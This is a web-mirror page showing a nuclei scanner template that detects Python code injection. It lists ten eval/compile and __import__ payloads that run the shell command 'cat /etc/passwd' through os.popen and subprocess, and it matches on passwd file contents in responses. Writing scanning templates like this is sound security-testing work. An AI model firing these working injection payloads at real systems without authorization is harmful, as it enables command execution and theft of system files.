admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-02 00:33:27 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
ba03e54063a94de8155adf476dc07e5b39bca341
nuclei-templates/dast/vulnerabilities/cmdi/python-code-injection.yaml
Prince Chaddha ea7a5969c8 Revert "chore: update TemplateMan 🤖" 
This reverts commit c31d574176.
2025-05-27 10:39:47 +08:00

49 lines
2.0 KiB
YAML
Raw Blame History

id: python-code-injection
info:
name: Python Code Injection
author: ritikchaddha
severity: high
tags: python,dast,injection,cmdi
variables:
Command: "cat /etc/passwd"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
injection:
- eval(compile("""for x in range(1):\\n import os\\n os.popen(r'{{Command}}').read()""",'','single'))
# without loop, one expression
- eval(compile("""__import__('os').popen(r'{{Command}}').read()""",'','single'))
# without loop, one expression
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True)""",'','single'))
# without compile
- __import__('os').popen('{{Command}}').read()
# multiple expressions, separated by commas
- str("-"*50),__import__('os').popen('{{Command}}').read()
# multiple statements, separated by semicolons
- eval(compile("""__import__('os').popen(r'{{Command}}').read();import time;time.sleep(2)""",'','single'))
- eval(compile("""__import__('subprocess').check_output(r'{{Command}}',shell=True);import time;time.sleep(2)""",'','single'))
# with `for` loop technique, without global __import__ using subprocess.popen
- eval(compile("""for x in range(1):\n import os\n os.popen(r'{{Command}}').read()""",'','single'))
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.Popen(r'{{Command}}',shell=True, stdout=subprocess.PIPE).stdout.read()""",'','single'))
- eval(compile("""for x in range(1):\n import subprocess\n subprocess.check_output(r'{{Command}}',shell=True)""",'','single'))
fuzzing:
- part: query
type: replace
fuzz:
- "{{injection}}"
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
# digest: 490a00463044022064ced5a02135a5ba8b7c175805059e306f3733d3bbf857549147c9c0ccbd384002201c08821cca27e513e75cac1aac095d5b3a88042240da35c639097b520cc3e448:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink